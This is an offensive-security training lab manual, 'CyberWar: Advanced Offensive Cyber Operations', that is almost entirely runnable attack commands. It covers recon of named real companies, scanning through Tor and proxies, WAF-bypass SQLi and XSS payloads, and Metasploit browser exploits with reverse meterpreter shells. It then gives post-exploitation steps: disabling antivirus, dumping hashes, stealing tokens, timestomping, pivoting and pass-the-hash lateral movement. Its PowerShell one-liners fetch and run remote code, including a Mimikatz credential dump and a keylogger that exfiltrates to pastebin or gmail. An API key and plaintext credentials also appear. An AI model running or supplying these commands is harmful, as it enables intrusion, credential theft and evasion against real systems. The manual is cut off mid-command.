CyberWar AOCO 2014

Strategic Security, Inc.
http://strategicsec.com/
CyberWar: Advanced
Offensive Cyber
Operations
Written by Joe McCray
Contributors:

This Page Intentionally Left Blank
Contents

This Page Intentionally Left Blank .......................................................................................................................... 6
Section 1: Attacking From The Outside .................................................................................................................. 7
Lab 1: Target IP Determination ............................................................................................................................... 7
Lab 1a: Blindcrawl .....................................................................................................................................................7
Lab 1b: Fierce ............................................................................................................................................................8
Lab 1c: GXFR .............................................................................................................................................................9
Lab 1d: IP Crawl ......................................................................................................................................................10
Lab 2: Identifying Security Mechanisms ............................................................................................................... 14
Lab 2a: LBD .............................................................................................................................................................14
Lab 2b: Halberd .......................................................................................................................................................15
Lab 2c: OSSTMM .....................................................................................................................................................18
Lab 2d: SSLTEST .......................................................................................................................................................19
Lab 3: Dealing With Web Application Firewalls .................................................................................................... 21
Lab 2a: Web Application Firewall Detection ...........................................................................................................21
Lab 3b: WAF Bypass SQL Injection Payloads ...........................................................................................................22
Lab 3c: WAF Bypass Cross Site Scripting Payloads ..................................................................................................23
Lab 4: Quick Hits (Googling for vulnerabilities) .................................................................................................... 24
Lab 4a: Google for generic Database errors ...........................................................................................................24
Lab 4b: Google for generic RFIs...............................................................................................................................24
Lab 4c: Check for XSS at xxsed.com:........................................................................................................................25
Lab 5: 3rd Party Scanning and scanning via proxies .............................................................................................. 25

Lab 5a: Shodan........................................................................................................................................................26
Lab 5b: Proxyfinder.pl..............................................................................................................................................26
Lab 5c: Tor/Tor-resolve ............................................................................................................................................27
Lab 5d: Proxychains/Proxyresolv.............................................................................................................................28
Lab 5e: Port scanning through PHP proxies ............................................................................................................29
Lab 6: Nessus through Tor .................................................................................................................................... 32

Lab 7: Burp Suite .................................................................................................................................................. 34
Lab 7a: Burp Suite Through Tor/Privoxy ..................................................................................................................40
Lab 7b: Masking Nikto Headers ..............................................................................................................................44
Lab 8: Tor Through and SSH Tunnel ...................................................................................................................... 49
Section 2: Attacking The Internal Network ........................................................................................................... 59
Lab 9: Email Address Harvesting .......................................................................................................................... 62
Lab 10: Browser Fingerprinting ............................................................................................................................ 68
Lab 10a: Central Ops ...............................................................................................................................................68
Lab 10b: Metasploit ................................................................................................................................................71
Lab 11: Client-Side Enumeration .......................................................................................................................... 73
Lab 11a: Getting your shell .....................................................................................................................................73
Lab 11b: Figure out who and where you are ..........................................................................................................75
Lab 11c: Escalate privileges and get hashes ...........................................................................................................76
Lab 11d: Escalate Enumerate the host you are on ..................................................................................................79
Lab 11e: Steal Tokens ..............................................................................................................................................83
Lab 11f: Prove access ..............................................................................................................................................86
Lab 11g: Enumerate the network you are on ..........................................................................................................87
Lab 11h: Set up your Pivot ......................................................................................................................................89
Lab 11i: Now set up Pivot with a route add ............................................................................................................90
Lab 11j: Scan through your Pivot ............................................................................................................................90
Lab 11k: Lateral movement through your Pivot ......................................................................................................91
Lab 11l: Pivot Persistence ........................................................................................................................................92
Lab 11m: Set up a Socks Proxy through your Pivot .................................................................................................97
Lab 11n: SSH Tunneling ...........................................................................................................................................99
Lab 11o: VPN Pivot ................................................................................................................................................101
Lab 11p: ICMP Tunneling ......................................................................................................................................104
Lab 11q: IPv6 to IPv4 Tunnel .................................................................................................................................106
Lab 12: VBScript For Post Exploitation ............................................................................................................... 108
Lab 12a: Identifying the IP Address .......................................................................................................................108
Lab 12b: Download a file from the internet ..........................................................................................................109
Lab 13: Running Powershell From A Command Prompt ..................................................................................... 111

Lab 13a: Reverse Shell with Powershell ................................................................................................................111
Lab 13b: Payload which could execute shellcode from DNS TXT queries. .............................................................112
Lab 13c: Run mimikatz via powershell (must be run as SYSTEM) .........................................................................113
Lab 13d: Token Manipulation to escalate (must be run as an Administrator) ......................................................114
Lab 13e: Nihsang payload which Scan IP-Addresses, Ports and HostNames ........................................................115
Lab 13f: Nishang Payload which gathers juicy information from the target. .......................................................116
Lab 13g: Nishang Payload which logs keys. ..........................................................................................................116
Lab 13h: Nishang Payload which silently browses to a URL and accepts Java Applet Run Warning ....................118
Lab 13i: Nishang Payload which dumps keys for WLAN profiles. ..........................................................................118
Lab 14: SchTasks for Powershell ......................................................................................................................... 122
Lab 15: Host Enumeration .................................................................................................................................. 129
Lab 16: Credential Harvesting & Data-Mining .................................................................................................... 139
Lab 17: Life without metasploit.......................................................................................................................... 160
Lab 18: Setting up your second entry ................................................................................................................. 167

This Page Intentionally Left Blank

Section 1: Attacking From The Outside

Lab 1: Target IP Determination
Lab 1a: Blindcrawl
cd ~/toolz
perl blindcrawl.pl -d motorola.com

Lab 1b: Fierce

cd ~/toolz/fierce2
fierce -dns motorola.com

Lab 1c: GXFR

cd ..
python gxfr.py --bxfr --dns-lookup -o motorola.com
Enter Domain Name: motorola.com
Bind API Key: cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=

Lab 1d: IP Crawl

DNS forward lookup against given IP range
cd ~toolz/
./ipcrawl 148.87.1.1 148.87.1.254

sudo nmap -sL 148.87.1.0-255
11

sudo nmap -sL 148.87.1.0-255 | grep oracle

dig google.com
13

Lab 2: Identifying Security Mechanisms

Lab 2a: LBD
cd ~/toolz
./lbd-0.1.sh google.com

Lab 2b: Halberd

halberd microsoft.com
15

halberd motorola.com

halberd oracle.com
17

Lab 2c: OSSTMM

osstmm-afd -P HTTP -t strategicsec.com -v

Lab 2d: SSLTEST

cd toolz/
cat /etc/xinetd.d/ssltest
cat /home/strategicsec/toolz/ssl_proxy.sh
service xinetd status
19

osstmm-afd -P HTTP -t 127.0.0.1 -p 8888 -v

Lab 3: Dealing With Web Application Firewalls

Lab 2a: Web Application Firewall Detection
WAF Detection
cd ~/toolz/wafw00f
python wafw00f.py http://www.oracle.com
cd ~/toolz/
sudo nmap -p 80 --script http-waf-detect.nse oracle.com
21

Lab 3b: WAF Bypass SQL Injection Payloads

Go to the address below in firefox:
http://www.modsecurity.org/demo/crs-demo.html
Insert the following payloads and keep track of the scores each payload receives
SQL Injection Payloads
' or 1=1
' or 1=1
%27%201=1%2D%2D
' and 8<9
%27%20and%208<9%2D%2D

Lab 3c: WAF Bypass Cross Site Scripting Payloads

<script>alert('xss')</script>
%3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E
prompt('xss')
prompt%28%27xss%27%29
23

Lab 4: Quick Hits (Googling for vulnerabilities)

Using Google for finding vulnerabilities
Lab 4a: Google for generic Database errors

site:example.com "Microsoft OLE DB Provider for SQL Server"
site:example.com "Microsoft JET Database Engine"
site:example.com "Type mismatch"
site:example.com "You have an error in your SQL syntax"
site:example.com "Invalid SQL statement or JDBC"
site:example.com "DorisDuke error"
site:example.com "OleDbException"
site:example.com "JasperException"
site:example.com "Fatal Error"
site:example.com "supplied argument is not a valid MySQL"
site:example.com "mysql_"
site:example.com ODBC
site:example.com JDBC
site:example.com ORA-00921
site:example.com ADODB
Lab 4b: Google for generic RFIs

site:example.com ".php" "file="
site:example.com ".php" "folder="
site:example.com ".php" "path="
site:example.com ".php" "style="
site:example.com ".php" "template="
site:example.com ".php" "PHP_PATH="
site:example.com ".php" "doc="
site:example.com ".php" "document="
site:example.com ".php" "document_root="
site:example.com ".php" "pg="
site:example.com ".php" "pdf="
site:example.com ".php: "page="
site:example.com ".php: "inc="
site:example.com ".php: "dir="
site:example.com ".php: "frame="
site:example.com ".php: "swf="
site:example.com ".php: "host="

Lab 4c: Check for XSS at xxsed.com:

http://xssed.com/search?key=example.com
25

Lab 5: 3rd Party Scanning and scanning via proxies

Lab 5a: Shodan
http://www.shodanhq.com/
Create an account and login. Must have an account to use filters.
net:129.188.8.0/24
Lab 5b: Proxyfinder.pl

Proxyfinder.pl is a perl script that will scrape multiproxy or samair to get you as many proxys as you
specify. You can then use these proxys with Proxychains.
perl proxyfinder-0.3.pl multiproxy 10 results.txt

This step takes some time, upwards of an hour. It has to go through every proxy and make sure that it is
alive. Once its done, copy the contents of your results.txt file into your /etc/proxychains.conf. Make sure
to copy and paste them in the appropriate section.
Lab 5c: Tor/Tor-resolve

We can even use tor-resolve to resolve host name information.
tor &
(this starts TOR - it should already be running on your VM)
Open up another tab to resolve the hostname

tor-resolve strategicsec.com
27

Lab 5d: Proxychains/Proxyresolv

Proxychains is in the repositories for many of the current linux distros.
Lets see what we can do. Start tor, then run the following command:
proxyresolv <hostname>
Proxyresolv is used to resolve host names via a proxy or TOR.

Now lets port scan a machine through proxychains
proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000
[ip address/ip range]

We can even run Nikto through proxychains

cd toolz/nikto-2.1.1/
proxychains perl nikto.pl -Cgidirs all -o google_nikto.txt -host www.google.com
Lab 5e: Port scanning through PHP proxies

In previous labs weve seen the use of the SOCKS proxy. In this lab we will be looking at a trend that
seems to be growing in popularity, PHP proxies. Sensepost has a tool called glypeahead that allows us
to port scan through these proxies.
29

Download the tool from: http://www.sensepost.com/research/glypeahead/

Once youve downloaded and unzipped the file you will be greeted with a directory containing 3 files and
a directory. What we are really interested in is the config.php and the application itself.
The config.php file is where you will specify what site you would like to scan
Its in this section that you can also specify what ports you want glypeahead to scan. At the bottom of the
configuration file, you can also specify what proxies you would like glypeahead to use.
You can get a list of glype proxies from the following link: http://www.azproxies.com/proxy-lists/glype-webproxies.html
Make sure that when you put in the proxies you end with index.php otherwise glypeahead will error out.

Of course, you can always add more proxies. You do not have to limit yourself to only two. The same
goes for the sites, you can always change the ports to whatever you want to scan for. I left them the
same for simplicity. This is what youll get when everything works out fine.
GlypeAhead needs to be fed the config.php file
31

Lab 6: Nessus through Tor

Register & Download Nessus
Register for a free account to download a copy of HomeFeed Nessus vulnerability scanner at
http://www.nessus.org/products/nessus/nessus-download-agreement
Installing Nessus
This installation is performed on the Ubuntu x86 machine. Follow the instructions to install Nessus on
other platforms
Initial Account Setup

Open a browser on your machine and go to https://localhost:8834
You will be asked to create an administrative account to manage Nessus. In this example, we will create
an account admin with the password password1. Click Next and proceed with the rest of the setup
process.

After nessus has been installed, execute the following command to tunnel all incoming connections to the
target address via Tors SOCKS server
socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:<target ip addres>:80,socksport=9050
Now run a Nessus scan against localhost
Finally, once its completed. Look over the report.
33

Lab 7: Burp Suite

Download latest free version of Burp at http://www.portswigger.net/burp/download.html
java -jar burpsuite_free_v1.5.jar
- Click the "Proxy" tab
- Click the "Options" sub tab
- Select proxy listener and click on Edit. Go to Certificate tab.
Ensure that burp is configured to "generate CA-signed per-host certificates"
Open Firefox
- Click "Edit"
- Click Preferences"
- Click the "Advanced" tab
- Click the "Network" sub tab
- Click the connection "settings" button
- Click "manual proxy configuration"
set it to 127.0.0.1 port 8080
check "Use this proxy server for all protocols"
- Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line

Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CAsigned per-host certificates.
Visit any SSL-protected URL.
On the This Connection is Untrusted screen, click on Add Exception
Click "Get Certificate", then click "View".
35


In the Details tab, select the root certificate in the tree (PortSwigger CA).
Click "Export" and save the certificate as "BurpCert" on the Desktop.
37

Close Certificate Viewer dialog and click Cancel on the Add Security Exception dialog
Go to Edit | Preferences
Click Advanced and go to Encryption tab
Click View Certificates
Click "Import" and select the certificate file that you previously saved.

39

On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click
"OK".
Close all dialogs and restart Firefox.
Lab 7a: Burp Suite Through Tor/Privoxy

Since weve already installed Tor and configured it, privoxy should be working fine. But we need to
configure a few things before everything will work properly.
Open the file up config.conf in your favorite text editor and search for 9050

Once youve found the line that says forward-socks5 / 127.0.0.1:9050, go ahead and uncomment it.
Now we need to configure the proxy settings.
41


If you are using Burp v1.5 the proxy settings are under the options tab.
We need to set this up to go through Privoxy. Currently Privoxy listens on port 8118 by default. Scroll
down until you see the section labeled upstream proxy servers, fill in the proxy host with the localhost
address 127.0.0.1. Use 8118 for the proxy port. Click on the add button when finished.
43

Once youre finished with this, the final step is to fire up Tor and Privoxy.
Lab 7b: Masking Nikto Headers

In this lab we are going to be masking the Nikto User-Agent in the request header. Navigate to the
directory where youve stored Nikto. In this directory youll notice a nikto.conf file.

Open up the config file in your favorite text editor and look for the lines referencing proxy options.
Uncomment the two lines for PROXYHOST and PROXYPORT you will also have to change the
PROXY port to go through Burp.
If we run Nikto we can see what the user agent looks like.
45

Now to modify Niktos User-Agent to do this we need the mechanize.rb rubygem. If you are on Fedora
you can simply use yum to install it. If not you can download it at (http://mechanize.rubyforge.org) or use
the command:
sudo gem install mechanize
If youve installed it via gem install then navigate to the /usr/lib//gems/1.8/gems/mechanize-2.5.1/lib/
In the mechanized.rb file you can see the different user agents. From this list we need to make a
separate user-agent.txt file. You may want to clean it up a little bit.
Now we have to can change the user-agent. Go into Burp and navigate to Proxy -> Options and scroll
down to Match and Replace.

Just copy and paste in the user-agent information from your user-agent.txt file. I am going to use the Mac
Firefox user-agent.
Make sure that the request header box is checked. Now run Nikto again.
47

Once you navigate to a web page, you should see the activity under the Proxy tab and then under the
Intercept tab:

Lab 8: Tor Through and SSH Tunnel

Before we get started we need to make sure that TOR is using the default port and listen-address.
Navigate to /etc/tor and open up the torrc file. You should see.
SocksPort 9050
SocksListenAddress 127.0.0.1
If your torrc file looks like this then we can go on. This next step depends on whether you are using
openssh or putty. If youre using openssh, then this step is pretty easy.
Lets say you have two machines, Host1 and Host2. Host2 will be the PC that youre wanting to route
traffic from and Host1 is the PC that is running Tor. From Host2, run:
ssh -L 9050:127.0.0.1:9050 user@Host1
Now that weve logged in, the tunnel is active. So if we connect to localhost:9050, a local connection to
our other machine (Host2) will be established. We will get redirected to our Linux machine through an
encrypted ssh-tunnel. If we configure Firefox on Host2 to use 127.0.0.1:9050 as a SOCKS proxy, our
traffic will be tunneled through the SSH tunnel to Host1 and out over Tor.
49

The procedure on your Windows machine is pretty much the same, just more GUI based. First, open up
PuTTY.

51

We need to configure our connection. Navigate to Connection -> SSH -> Tunnels

For the Source Port enter 9050 and for the Destination put 127.0.0.1:9050 and finally click Add.
53

Now go to Session and enter the IP address of Host1 under Host Name (or IP Address). Click Open.

Login using the username and password of Host1.
55

Now that youve set up PuTTY, install foxyproxy for Firefox and add a new proxy.

Under Select Mode, choose Use Proxy 127.0.0.1 for all URLs.
There is a problem doing this. By default Firefox uses your local DNS, even if you use SOCKS. So you
have to tell Firefox to request everything through SOCKS. To do this open a new tab in Firefox and type
about:configin the filter field type in network.proxy.socks_remote_dns If this value is not to set true
set it to true Now check if your surfing anonymously.
57

If everything goes right, your traffic will be forwarded over the SSH tunnel to Host1 and out through Tor.

Section 2: Attacking The Internal Network

You can download the attack virtual machine from here:
https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
user:
strategicsec
pass:
strategicsec
STRATEGICSEC-Ubuntu VPN Setup
You will need your vpn username and password provided by Joseph McCray, in order to complete this
installation.
Login to the Strategic-Ubuntu vm with user/pass: strategicsec/strategicsec
Youll be presented with an empty desktop. Open a Terminal window by holding down [Ctrl+Alt] and then
pressing T. Or find it through the left sidebar by clicking on Dash home
59

then typing terminal in the search bar
and selecting Terminal.

At the newly open Terminal window, type the command: vpn
Enter the password for the strategicsec user here.

The VPN service will start and will ask you for your username, then your password. This is the Username
and Password that has been provided to you by Joe McCray.

At this point youll see a bunch of text while the VPN service connects.
When this completes, you can open another Terminal window or tab and type the command: ifconfig
This will show you all of your network interfaces and you can verify that a tap0 interface has been created
and you have been assigned an ip address in the lab.
Congratulations you are ready to begin working in the Strategic Security Lab!
When you are ready to disable your VPN connection to the Lab network, you can issue a command to
disable the tap0 VPN interface: sudoifconfig tap0 down
61

Afterward you can verify the connection is down by typing ifconfig to show the network interfaces that are
up and by attempting to ping a previously known Lab ip address.
Lab 9: Email Address Harvesting

cd ~/toolz/
svn checkout http://theharvester.googlecode.com/svn/trunk/
cd theharvester-read-only/
python theHarvester.py

python theHarvester.py -d motorola.com -l 50 -b google
63

python theHarvester.py -d motorola.com -l 50 -b bing

65

python theHarvester.py -d motorola.com -l 50 -b linkedin
python theHarvester.py -d motorola.com -l 50 -b pgp

67

Lab 10: Browser Fingerprinting

Lab 10a: Central Ops
From your host machine - browse to 'http://centralops.net/' - click on Browser Mirror
cd /var/www
sudo wget https://s3.amazonaws.com/StrategicSec-Files/browser-fingerprint.zip
sudo unzip browser-fingerprint.zip
sudo touch browser.log

chmod 777 browser.log
cat config.php

tail -f /var/www/browser.log
****See the browswer version that connects to your server****
ctrl-z
69

sudo vi config.php
****change this line****

define('DEFAULT_REDIRECT', 'http://google.com');
****to this****
define('DEFAULT_REDIRECT', 'http://StrategicSec-Ubuntu-Tap0-IP:8080/attack');

Lab 10b: Metasploit

cd ~/toolz/metasploit
sudo ./msfconsole
use exploit/windows/browser/ie_cgenericelement_uaf
set ExitOnSession false
set URIPATH /attack
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST StrategicSec-Ubuntu-Tap0-IP
exploit -j
71


Lab 11: Client-Side Enumeration

Lab 11a: Getting your shell
echo yourname > /home/strategicsec/yourname.txt
cd /home/strategicsec/toolz/metasploit
./msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set ExitOnSession true
set LPORT 7777
73

exploit -j
Now you should only have to wait a few minutes and then you should see an incoming meterpreter
session.
We'll simulate having spear-phished a victim.
After that you should see metasploit sending the exploit to the IP address of a Windows 7 host, and after
that you should see a new session created.
You can list the active sessions by typing:
sessions -l
You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you
want to interact with)
sessions -i 1
You should now see Metasploit's meterpreter prompt.

Lab 11b: Figure out who and where you are

meterpreter> sysinfo
meterpreter> getuid
75

meterpreter> ipconfig
meterpreter> run post/windows/gather/checkvm
meterpreter> run get_local_subnets
Lab 11c: Escalate privileges and get hashes

meterpreter> getsystem
meterpreter> getuid
meterpreter> run killav
77

meterpreter> run post/windows/gather/hashdump
meterpreter> run post/windows/gather/credentials/credential_collector

meterpreter> rev2self
meterpreter> getuid
Lab 11d: Escalate Enumerate the host you are on

meterpreter > run getcountermeasure
79

meterpreter> run winenum
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/usb_history
81

meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum_snmp

meterpreter> reg enumkey k
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Lab 11e: Steal Tokens

meterpreter > getsystem
meterpreter > use incognito
83

meterpreter > list_tokens u

meterpreter > list_tokens g
meterpreter > impersonate_token BUILTIN\\Users <-- choose who you want to impersonate but be sure to
use 2 slashes in the name (ex: impersonate_token domain\\user)
meterpreter> getuid
85

meterpreter> rev2self
Lab 11f: Prove access

meterpreter> upload /home/strategicsec/yourname.txt c:\\
meterpreter > timestomp C:\\yourname.txt -v
meterpreter > timestomp C:\\ yourname.txt -m "12/12/2013 12:12:13"

meterpreter > timestomp C:\\ yourname.txt -v
Lab 11g: Enumerate the network you are on

meterpreter > run netenum
87

meterpreter > run netenum -ps -r 10.10.30.0/24

meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.30.0/24
Lab 11h: Set up your Pivot

meterpreter > background
<-- background the session
msf exploit(handler) > back
<--- you need to get to main msf> prompt
sessions -l
<-- Find a session you want to pivot through (note the IP and session
number)
89
You want to get back to this prompt:

Lab 11i: Now set up Pivot with a route add

route print
route add 10.10.30.50 255.255.255.0 28
route print
<-- Use correct session id (2), it may be 3, or 4
route remove 10.10.30.50 255.255.255.0 28

route print
<-- Use correct session id (2), it may be 3, or 4

<----- verify new route
Lab 11j: Scan through your Pivot

use auxiliary/scanner/portscan/tcp
set THREADS 10
set RHOSTS set RHOSTS 10.10.30.60-70
scan until you find something you want to attack
set RPORTS 445
run
<-- Run aux modules through your pivot

<-- Keep changing this IP and re-running the

Lab 11k: Lateral movement through your Pivot

use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
set payload windows/meterpreter/reverse_tcp
set RHOST 10.10.30.63
set LHOST 10.10.5.235
set LPORT 5678
exploit
91

Lab 11l: Pivot Persistence

***Update Metasploit installation
***make two meterpreter sessions
set RHOST 10.10.30.87
set LPORT 5678
exploit

background
set RHOST 10.10.30.81

exploit
93

background
use post/windows/manage/portproxy
sessions -l
set session 2

set local_port 9001
set local_address 0.0.0.0
set connect_port 9002
set connect_address 10.10.30.87
run
set session 1
set local_port 9002
set local_address 0.0.0.0
set connect_port 80
set connect_address 10.10.10.105
run
95

test proxy
wget --server-response --spider 10.10.30.81:9001

Lab 11m: Set up a Socks Proxy through your Pivot

use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run
97

Open a new terminal
sudo vi /etc/proxychains.conf
Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and
save it.
socks4 127.0.0.1 1080
proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 10.10.30.0/24
proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000

10.10.30.0/24

Lab 11n: SSH Tunneling

sudo vi /etc/proxychains.conf
change last line to socks4 127.0.0.1 9060
99

check proxychains connection with

proxychains wget 10.10.10.105
not working
connect to ssh
ssh -D 127.0.0.1:9060 root@10.10.10.107

pass: mysql123
open new terminal and check again connection
Lab 11o: VPN Pivot

use exploit/multi/ssh/sshexec
set PASSWORD mysql123
set RHOST 10.10.10.107
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.5.235
set LPORT 4444
exploit
101

meterpreter > portfwd add -l 2222 -p 22 -r 127.0.0.1

background
route add 10.10.10.0 255.255.255.0 1
sudo apt-get install sshuttle
sudo sshuttle -vr root@127.0.0.1:2222 0/0
password: mysql123

test connection with http://www.whatismyip.com/
103

Lab 11p: ICMP Tunneling

open msfconsole
set payload windows/meterpreter/reverse_tcp
set rhost 10.10.30.63
set lhost 10.10.5.235
exploit
open second console
cd ~/toolz
git clone https://github.com/inquisb/icmpsh.git
cd icmpsh
from meterpreter session

meterpreter > getwd
C:\Windows\system32
meterpreter > getlwd
/home/strategicsec/toolz/metasploit
meterpreter > lcd ../icmpsh
meterpreter > getlwd
/home/strategicsec/toolz/icmpsh
meterpreter > upload icmpsh.exe
[*] uploading : icmpsh.exe -> icmpsh.exe
[*] uploaded : icmpsh.exe -> icmpsh.exe

meterpreter > shell

C:\Windows\system32>icmpsh.exe -t 10.10.5.235 -d 500 -b 30 -s 128
exit from shell and meterpreter session

return back to second console
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
sudo python icmpsh_m.py 10.10.5.235 10.10.30.63
ipconfig
105

Lab 11q: IPv6 to IPv4 Tunnel

Go to http://tunnelbroker.net and sign up for an account.
You will be emailed your account credentials.
route print
netsh
interface ipv6
show interfaces

add v6v4tunnel IP6Tunnel 192.168.1.9 216.218.224.42

add address IP6Tunnel 2001:470:1f0e:d9f::2
add route ::/0 IP6Tunnel 2001:470:1f0e:d9f::1
Reference:
http://www.cellstream.com/intranet/tipsandtricks/160-setting-up-a-6to4-tunnel-in-windows-7.html
IPv6 Direct Access
Reference:
http://www.slideshare.net/AlexdeJong/direct-access-for-dummies
http://directaccess.richardhicks.com/2013/06/24/isatap-recommendations-for-directaccess-deployments/
107

Lab 12: VBScript For Post Exploitation

Lab 12a: Identifying the IP Address
What is my external IP address?
echo Dim joe > ip.vbs
echo Set joe = CreateObject("MSXML2.XMLHTTP") >> ip.vbs
echo joe.open "GET", "http://icanhazip.com", False >> ip.vbs
echo joe.send >> ip.vbs
echo WScript.StdOut.Write joe.responseText >> ip.vbs
cscript ip.vbs

Lab 12b: Download a file from the internet

echo 'Barabas pure vbs downloader - tested on XP sp2' > vbs_download.vbs
echo 'Microsoft fixed adodbstream but guess what :)' >> vbs_download.vbs
echo '(c)dec 2004 >> vbs_download.vbs
echo 'First argument = complete url to download >> vbs_download.vbs
echo 'Second Argument = filename you want to save' >> vbs_download.vbs
echo 'thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/' >> vbs_download.vbs
echo 'v2 - now includes proxy support for the winhttp request stuff' >> vbs_download.vbs
echo strUrl = WScript.Arguments.Item(0) >> vbs_download.vbs
echo StrFile = WScript.Arguments.Item(1) >> vbs_download.vbs
echo 'WinHttpRequest proxy settings. >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> vbs_download.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> vbs_download.vbs
echo Err.Clear >> vbs_download.vbs
echo Set http = Nothing >> vbs_download.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>
vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> vbs_download.vbs
echo ' comment out next line if no proxy is being used >> vbs_download.vbs
echo ' and change the proxy to suit ur needs -duh >> vbs_download.vbs
echo 'http.SetProxy HTTPREQUEST_PROXYSETTING_PROXY, "someproxy:8080" >>
vbs_download.vbs
echo http.Open "GET", strURL, False >> vbs_download.vbs
echo http.Send >> vbs_download.vbs
echo varByteArray = http.ResponseBody >> vbs_download.vbs
echo Set http = Nothing >> vbs_download.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> vbs_download.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> vbs_download.vbs
echo strData = "" >> vbs_download.vbs
echo strBuffer = "" >> vbs_download.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> vbs_download.vbs
echo
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> vbs_download.vbs
echo Next >> vbs_download.vbs
echo ts.Close >> vbs_download.vbs
more vbs_download.vbs
109

cscript vbs_download.vbs http://strategicsec.com/joe.txt joe.txt

Lab 13: Running Powershell From A Command Prompt

Lab 13a: Reverse Shell with Powershell
sudo ./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 10.10.5.235
set LPORT 443
set EXITFUNC thread
exploit -j
powershell -command "IEX (New-Object
Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/InvokeShellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.10.5.235 -Lport
443 -Force"
111

Lab 13b: Payload which could execute shellcode from DNS TXT queries.
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/ExecuteDNSTXT-Code.ps1','%TEMP%\Execute-DNSTXT-Code.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Execute-DNSTXT-Code.ps1
32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com

Lab 13c: Run mimikatz via powershell (must be run as SYSTEM)

powershell "IEX (New-Object
Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'); InvokeMimikatz -DumpCreds"
113

Lab 13d: Token Manipulation to escalate (must be run as an Administrator)

powershell -command "IEX (New-Object
Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/InvokeTokenManipulation.ps1') ; Invoke-TokenManipulation"

Lab 13e: Nihsang payload which Scan IP-Addresses, Ports and HostNames
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/InvokePingSweep.ps1','%TEMP%\Invoke-PingSweep.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-PingSweep.ps1 -StartAddress
10.10.30.50 -EndAddress 10.10.30.100 -ResolveHost -ScanPort
115

Lab 13f: Nishang Payload which gathers juicy information from the target.
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/GetInformation.ps1','%TEMP%\Get-Information.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-Information.ps1
Lab 13g: Nishang Payload which logs keys.

powershell.exe (new-object
System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Keylogger.ps1','%TEMP%\Keylogger.ps
1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Keylogger.ps1 <dev_key> <username>
<pass> 3 http://example.com stopthis
PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for tinypaste.
Unused for gmail option.
.PARAMETER username
Username for the pastebin account where data would be pasted.
Username for the tinypaste account where data would be pasted.
Username for the gmail account where attachment would be sent as an attachment.
.PARAMETER password
Password for the pastebin account where data would be pasted.
Password for the tinypaste account where data would be pasted.
Password for the gmail account where data would be sent.
.PARAMETER keyoutoption
The method you want to use for exfitration of data.
"0" for displaying on console
"1" for pastebin.
"2" for gmail
"3" for tinypaste
.PARAMETER MagicString
The string which when found at CheckURL will stop the keylogger.
.PARAMETER CheckURL
The URL which would contain the MagicString used to stop keylogging.
117

Lab 13h: Nishang Payload which silently browses to a URL and accepts Java
Applet Run Warning
(msfconsole 1)
use exploit/multi/browser/java_signed_applet
set SRVHOST 10.10.5.235
set URIPATH strategicsec
exploit
(msfconsole 2)
powershell.exe (new-object
System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Browse_Accept_Applet.ps1','%TEMP%\
